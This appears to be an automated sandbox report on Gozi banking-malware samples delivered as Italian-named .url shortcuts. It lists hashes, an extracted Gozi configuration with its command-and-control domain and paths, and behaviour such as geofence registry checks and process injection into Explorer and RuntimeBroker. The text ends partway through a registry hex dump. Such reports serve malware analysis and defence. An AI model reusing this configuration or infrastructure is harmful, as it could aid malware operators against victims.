Overview
overview
10Static
static
1url/Ammini...ne.url
windows10-1703-x64
10url/Ammini...ne.url
windows10-2004-x64
10url/Azienda.url
windows10-1703-x64
10url/Azienda.url
windows10-2004-x64
10url/Cliente.url
windows10-1703-x64
10url/Cliente.url
windows10-2004-x64
10url/Documenti.url
windows10-1703-x64
10url/Documenti.url
windows10-2004-x64
10url/Informazioni.url
windows10-1703-x64
10url/Informazioni.url
windows10-2004-x64
10url/dettagli.url
windows10-1703-x64
10url/dettagli.url
windows10-2004-x64
10url/inform.url
windows10-1703-x64
10url/inform.url
windows10-2004-x64
10url/modulo.url
windows10-1703-x64
10url/modulo.url
windows10-2004-x64
10url/processo.url
windows10-1703-x64
10url/processo.url
windows10-2004-x64
10url/sistema.url
windows10-1703-x64
10url/sistema.url
windows10-2004-x64
10Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
13-10-2023 01:40
Static task
static1
Behavioral task
behavioral1
Sample
url/Amministrazione.url
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
url/Amministrazione.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
url/Azienda.url
Resource
win10-20230915-en
Behavioral task
behavioral4
Sample
url/Azienda.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
url/Cliente.url
Resource
win10-20230915-en
Behavioral task
behavioral6
Sample
url/Cliente.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
url/Documenti.url
Resource
win10-20230915-en
Behavioral task
behavioral8
Sample
url/Documenti.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
url/Informazioni.url
Resource
win10-20230915-en
Behavioral task
behavioral10
Sample
url/Informazioni.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
url/dettagli.url
Resource
win10-20230831-en
Behavioral task
behavioral12
Sample
url/dettagli.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
url/inform.url
Resource
win10-20230915-en
Behavioral task
behavioral14
Sample
url/inform.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
url/modulo.url
Resource
win10-20230915-en
Behavioral task
behavioral16
Sample
url/modulo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
url/processo.url
Resource
win10-20230915-en
Behavioral task
behavioral18
Sample
url/processo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
url/sistema.url
Resource
win10-20230915-en
General
-
Target
url/Azienda.url
-
Size
193B
-
MD5
385b2d1cc0f48c9b113009619258b210
-
SHA1
2a956120277957bf6b11ec05568e148cb1c0bc7c
-
SHA256
589deb6665a90960cfbe3db62f3477f9a2087a2b2eb03d1a19ea69374a9eb34e
-
SHA512
a82d7f78c72d8ba1849473a7ac2536e1c332289fbdf11c6ea6f5de6f182208871a4ccb59a0f5facccdd6d0c78e9c9e10dcfe4aa067426fe0ce69358477364e18
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 100 2532 rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exerundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2532 rundll32.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1752 set thread context of 3164 1752 powershell.exe Explorer.EXE PID 3164 set thread context of 3724 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 3988 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 4280 3164 Explorer.EXE cmd.exe PID 3164 set thread context of 4884 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 4936 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 2736 3164 Explorer.EXE cmd.exe PID 4280 set thread context of 3712 4280 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c6e16a9d-91e5-4d9d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b126a22d-6f35-4bac = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e9529d36-a111-483c = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\23ed70f3d13649c83f6a2c6c70242b2d29894d6bdcf72f09b77b65b60bc29704" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\01ae952d-5564-4ad5 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000079c1fa376fdd901079c1fa376fdd901079c1fa376fdd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d57690d2000326261383339346536366161363036313265333432343064353963336331383236306131663939626164623135663966333537343031626466653562323737310000b20009000400efbe4d57690d4d57690d2e00000000000000000000000000000000000000000000000000f9e2a900320062006100380033003900340065003600360061006100360030003600310032006500330034003200340030006400350039006300330063003100380032003600300061003100660039003900620061006400620031003500660039006600330035003700340030003100620064006600650035006200320037003700310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32626138333934653636616136303631326533343234306435396333633138323630613166393962616462313566396633353734303162646665356232373731000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb7632223a0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb7632223a0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cd02386-e334-4a18 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000025ac70a376fdd90125ac70a376fdd90125ac70a376fdd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d57690d2000323365643730663364313336343963383366366132633663373032343262326432393839346436626463663732663039623737623635623630626332393730340000b20009000400efbe4d57690d4d57690d2e00000000000000000000000000000000000000000000000000dbd25800320033006500640037003000660033006400310033003600340039006300380033006600360061003200630036006300370030003200340032006200320064003200390038003900340064003600620064006300660037003200660030003900620037003700620036003500620036003000620063003200390037003000340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32336564373066336431333634396338336636613263366337303234326232643239383934643662646366373266303962373762363562363062633239373034000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb7632226a0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb7632226a0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f061b408-c25d-419c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cd02386-e334-4a18 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f419cd3b13862428cbd0124d5357a17ca95acf2cb8dc58f94968f296da50c313" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cd02386-e334-4a18 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f24b4fa376fdd901f24b4fa376fdd901f24b4fa376fdd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d57690d2000663431396364336231333836323432386362643031323464353335376131376361393561636632636238646335386639343936386632393664613530633331330000b20009000400efbe4d57690d4d57690d2e000000000000000000000000000000000000000000000000000e337a00660034003100390063006400330062003100330038003600320034003200380063006200640030003100320034006400350033003500370061003100370063006100390035006100630066003200630062003800640063003500380066003900340039003600380066003200390036006400610035003000630033003100330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66343139636433623133383632343238636264303132346435333537613137636139356163663263623864633538663934393638663239366461353063333133000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb7632224a0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb7632224a0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fc0bc24f-a900-456a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fc0bc24f-a900-456a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b2ba88a0-a6dd-4328 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000469fa6a476fdd90146ba13ab76fdd90146ba13ab76fdd901788d07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d576a0d2000346132653439616433383864353130663166346436353930376466343932336533343030383265326163666235313930653964663132623163313061363935610000b20009000400efbe4d576a0d4d576a0d2e00000000000000000000000000000000000000000000000000021ae300340061003200650034003900610064003300380038006400350031003000660031006600340064003600350039003000370064006600340039003200330065003300340030003000380032006500320061006300660062003500310039003000650039006400660031003200620031006300310030006100360039003500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34613265343961643338386435313066316634643635393037646634393233653334303038326532616366623531393065396466313262316331306136393561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763222fa0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb763222fa0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\01ae952d-5564-4ad5 = f54f2ba376fdd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000069bf83a376fdd90169bf83a376fdd90169bf83a376fdd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d57690d2000343637343532366230343739626364336561626364393361316232343036323431383137623839326433336565386330393966343937366530383733653131370000b20009000400efbe4d57690d4d57690d2e0000000000000000000000000000000000000000000000000097bf4500340036003700340035003200360062003000340037003900620063006400330065006100620063006400390033006100310062003200340030003600320034003100380031003700620038003900320064003300330065006500380063003000390039006600340039003700360065003000380037003300650031003100370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34363734353236623034373962636433656162636439336131623234303632343138313762383932643333656538633039396634393736653038373365313137000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb7632227a0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb7632227a0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f061b408-c25d-419c = 047926a476fdd901 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cd02386-e334-4a18 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fc0bc24f-a900-456a = 9fd26da376fdd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a8476d6-516b-4840 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000465498a476fdd901ee2e75a676fdd901ee2e75a676fdd901b0ad05000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d696372